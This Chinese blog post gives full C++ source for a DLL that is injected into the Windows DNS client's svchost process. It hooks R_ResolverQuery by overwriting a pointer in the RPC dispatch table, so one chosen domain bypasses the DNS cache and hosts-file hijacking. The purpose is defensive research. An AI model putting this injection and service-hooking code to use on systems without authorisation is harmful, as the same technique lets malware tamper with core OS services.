--转载注明来源 http://www.cnblogs.com/sysnap/

0x1 背景

往HOST文件添加127.0.0.1  www.baidu.com, 可以劫持百度的域名。病毒经常篡改HOST文件来劫持域名,有没一种办法,不动HOST文件,又可以针对指定的域名使其不受HOST文件的影响?

0x02研究

通常进程调用gethostbyname来解析域名的IP,这个API内部会RPC到svchost里面去,由svchost来完成请求,最终调用R_ResolverQuery来完成解析工作,R_ResolverQuery的定义是int __stdcall R_ResolverQuery(unsigned __int16 *Handle, unsigned __int16 *pwsName, unsigned __int16 wType, unsigned int Flags, _DnsRecord **ppResultRecords),注意Flags,跟DnsQuery的fOptions是一样的,只要HOOK R_ResolverQuery, 判断pwsName是不是要保护的域名,然后给Flags或上DNS_QUERY_BYPASS_CACHE就可以了

0x03 R_ResolverQuery定位

定位R_ResolverQuery,这个函数是RPC IDL文件里面定义的,接口GUID为45776b01-5956-4485-9f80-f428f7d60129, 搜索dnsrslvr,找到45776b01-5956-4485-9f80-f428f7d60129特征就可以定位,具体的结构如下图所示

0x04 实现

一下是DLL的代码(XP测试通过,没测其它系统),需要找一个注入进程工具把DLL注入到svchost里面去,注意svchost是带-k NetWorkService的那个。HOOK函数会判断当前的域名解析请求是不是name_bypass_hostfile,是的话就不走缓存了

// dllmain.cpp : Defines the entry point for the DLL application.

#include "stdafx.h"

#include <windows.h>

#include <Rpc.h>

#include <rpcdcep.h>

#include <RpcNdr.h>

#define DNS_IF_GUID_LEN 16

unsigned char DNS_IF_GUID_[DNS_IF_GUID_LEN] = { 0x01, 0x6b, 0x77, 0x45, 0x56, 0x59, 0x85, 0x44, 0x9f, 0x80, 0xf4, 0x28, 0xf7, 0xd6, 0x01, 0x29};

static const wchar_t* name_bypass_hostfile = L"www.baidu.com";

typedef int (__stdcall * pfnR_ResolverQuery)(

unsigned __int16 *Handle,

unsigned __int16 *pwsName,

unsigned __int16 wType,

unsigned int Flags,

void **ppResultRecords

);

typedef long ( __stdcall * SERVER_ROUTINE)();

static pfnR_ResolverQuery g_old_pfnR_ResolverQuery = NULL;

static void** g_off = NULL;

void** get_R_ResolverQuery_off(void* Base, size_t Limit)

{

PRPC_SERVER_INTERFACE srv_if = NULL;

void** _R_ResolverQuery = NULL;

__try

{

unsigned char* s_ptr = (unsigned char*)Base;

for(size_t i = 0; i < Limit; i++, s_ptr++)

{

if( 0 == memcmp(DNS_IF_GUID_, s_ptr, DNS_IF_GUID_LEN) )

{

srv_if = (PRPC_SERVER_INTERFACE)(s_ptr - sizeof(unsigned int));

PMIDL_SERVER_INFO InterpreterInfo = (PMIDL_SERVER_INFO)srv_if->InterpreterInfo;

if(InterpreterInfo)

{

const SERVER_ROUTINE * DispatchTable = InterpreterInfo->DispatchTable;

_R_ResolverQuery = (void**)&DispatchTable[0x09];

}

break;

}

}

}__except(1)

{

;

}

return _R_ResolverQuery;

}

int __stdcall

fake_R_ResolverQuery(

unsigned __int16 *Handle,

unsigned __int16 *pwsName,

unsigned __int16 wType,

unsigned int Flags,

void **ppResultRecords

)

{

#define DNS_QUERY_BYPASS_CACHE 0x08

unsigned int _Flags = Flags;

if(_wcsicmp(name_bypass_hostfile, (const wchar_t *)pwsName) == 0)

{

OutputDebugStringW((LPCWSTR)pwsName);

OutputDebugStringW(L"\n");

_Flags |= DNS_QUERY_BYPASS_CACHE;

}

return g_old_pfnR_ResolverQuery(Handle, pwsName, wType, _Flags, ppResultRecords);

}

void** hook_R_ResolverQuery(void* Base, size_t Limit, void** oldptr, pfnR_ResolverQuery hookptr)

{

void** rs = NULL;

pfnR_ResolverQuery* p_R_ResolverQuery = (pfnR_ResolverQuery*)get_R_ResolverQuery_off(Base, Limit);

if(p_R_ResolverQuery)

{

DWORD lpflOldProtect = 0;

BOOL result = VirtualProtect((void*)p_R_ResolverQuery, sizeof(PVOID),

PAGE_EXECUTE_READWRITE, &lpflOldProtect);

if(result)

{

rs = (void**)p_R_ResolverQuery;

*oldptr = (void*)*p_R_ResolverQuery;

*p_R_ResolverQuery = hookptr;

VirtualProtect((void*)p_R_ResolverQuery, sizeof(PVOID),

lpflOldProtect, &lpflOldProtect);

}

}

return (void**)rs;

}

void unhook_R_ResolverQuery(void** off, void* Oldptr)

{

DWORD lpflOldProtect = 0;

BOOL result = VirtualProtect((void*)off, sizeof(PVOID),

PAGE_EXECUTE_READWRITE, &lpflOldProtect);

if(result)

{

*off = Oldptr;

VirtualProtect((void*)off, sizeof(PVOID),

lpflOldProtect, &lpflOldProtect);

}

}

DWORD WINAPI hook_worker(

LPVOID lpParameter

)

{

if(lpParameter == (PVOID)1)

{

HMODULE hmod = ::GetModuleHandleA("dnsrslvr.dll");

if(hmod)

{

void* oldptr = NULL;

void** off = hook_R_ResolverQuery((void*)hmod, 45568, &oldptr, fake_R_ResolverQuery);

g_old_pfnR_ResolverQuery = (pfnR_ResolverQuery)oldptr;

g_off = off;

}

}else

{

(void)unhook_R_ResolverQuery(g_off, g_old_pfnR_ResolverQuery);

}

return 0;

}

BOOL APIENTRY DllMain( HMODULE hModule,

DWORD  ul_reason_for_call,

LPVOID lpReserved

)

{

//

//DllMain创建线程,只要没任何等待线程的操作就是安全的,不会死锁.

//

switch (ul_reason_for_call)

{

case DLL_PROCESS_ATTACH:

{

DWORD lpThreadId;

CreateThread(NULL, 0, hook_worker, (PVOID)1, 0, &lpThreadId);

}

break;

case DLL_THREAD_ATTACH:

break;

case DLL_THREAD_DETACH:

break;

case DLL_PROCESS_DETACH:

{

//

//暴力卸载是不安全的.

//

DWORD lpThreadId;

CreateThread(NULL, 0, hook_worker, (PVOID)0, 0, &lpThreadId);

}

break;

}

return TRUE;

}

绕过本机DNS缓存的更多相关文章

  1. 查看和清除本机DNS缓存记录

    Windows上查看和清除本机DNS缓存记录: ipconfig /displaydns  查看ipconfig /flushdns  清除 貌似Time To Live的单位是秒.

  2. 如何清除本机DNS缓存

    如何清除本机DNS缓存 在实际应用过程中可能会遇到DNS解析错误的问题,就是说当我们访问一个域名时无法完成将其 解析到IP地址的工作,而直接输入网站IP却可以正常访问,这就是因为DNS解析出现故障造成 ...

  3. windows刷新本机DNS缓存

    ipconfig /flushdns

  4. Vista/Win7以上系统查看和清除本地DNS缓存新方法

    你是否因修改网站DNS解析后,却因本机DNS缓存而需要等待... 你是否遇到修改了本机的hosts文件后,必须重起firefox和ie才起作用... 其实只要清空DNS缓存这些问题都可以解决. 查看D ...

  5. 利用DNS缓存和TLS协议将受限SSRF变为通用SSRF

    本文首发于先知社区 前言 这是今年BlackHat上的一个议题:When TLS Hacks You,作者是latacora的Joshua Maddux 议题提出了一个新的ssrf攻击思路,利用DNS ...

  6. 刷新DNS命令 如何刷新DNS缓存(flushdns)

    运行:ipconfig /displaydns这个命令,查看一下本机已经缓存了那些的dns信息的,然后输入下面的命令 ipconfig /flushdns               这时本机的dns ...

  7. 如何清除DNS缓存,使用cmd命令清理DNS缓存方法

    如何清除DNS缓存,使用cmd命令清理DNS缓存方法 有时候电脑突然上不了网,或者存在某些网站打不开的情况,但别的网站又可以打开,解决办法需要清除DNS缓存,那么如何清除DNS缓存呢,最常用的方法就是 ...

  8. 一次dns缓存引发的惨案

    时间2015年的某个周六凌晨5点,公司官方的QQ群有用户反馈官网打不开了,但有的用户反馈可以打开,客服爬起来自己用电脑试了一下没有问题,就给客户反馈说,可能是自己网络的问题,请过会在试试.早点8点,越 ...

  9. dns缓存刷新时间是多久?dns本地缓存时间介绍

    原文: http://www.winwin7.com/JC/4742.html dns缓存刷新时间是多久?一般来说,我们只知道DNS解析是互联网绝大多数应用的实际寻址方式,在我们打开某站点,DNS返回 ...

随机推荐

  1. epoll、mysql概念及简单操作

    epoll 程序阻塞的过程 假设我们目前运行了三个进程A B C ,如果他们都在处于运行态,那就会被加到一个运行队列中 进程A正在运行socket程序 在linux中有句话,万物皆文件,socket对 ...

  2. HTML锚点的使用

    锚点: 连接到的本页面的位置:

  3. 面试想拿20K,HR说你只值10K,这个时候你该怎样回答或者反驳

    正确的做法是: 不动声色,继续跟HR谈下去.把面试流程走完,并且争取拿到这个10K的offer. 这里有一个小技巧: 如果拿到offer,礼貌地跟HR表示感谢,不过不要马上入职.可以找个由头,比方说自 ...

  4. 【Day4】4.Request对象之Get请求与URL编码

    import urllib.parse as up import urllib.request as ur kw = '动漫' data ={ 'kw':kw, 'ie':'utf-8', 'pn': ...

  5. 配置tmux在机器重启后自动恢复tmux工作现场,告别重启恐惧症

    1. 问题出现的背景 通过ssh远程登录服务器在上面工作,有时候很有可能由于网络断开而导致ssh链接断开,或者下班后想继续在家登录到服务器继续工作.这些情况都需要服务器保持我们的工作环境,比如,vim ...

  6. Spotlights【思维+前缀和优化】

    https://blog.csdn.net/mengxiang000000/article/details/53291883   原博客地址 http://codeforces.com/group/1 ...

  7. 写点恐怖小说为自己打call

    https://github.com/zhangbo2008/TryingWriteHorrorStory

  8. TCP/IP分层图解

    网络协议通常分不同层次进行开发,每一层分别负责不同的通信功能.一个协议族,比如 T C P / I P,是一组不同层次上的多个协议的组合. T C P / I P通常被认为是一个四层协议系统,如图1 ...

  9. Java并发包--ArrayBlockingQueue

    转载请注明出处:http://www.cnblogs.com/skywang12345/p/3498652.html ArrayBlockingQueue介绍 ArrayBlockingQueue是数 ...

  10. vs2008重置方法

    开始->Microsoft Visual Studio 2008->Visual Studio Tools->Visual Studio 2008 命令提示 然后依次键入如下命令: ...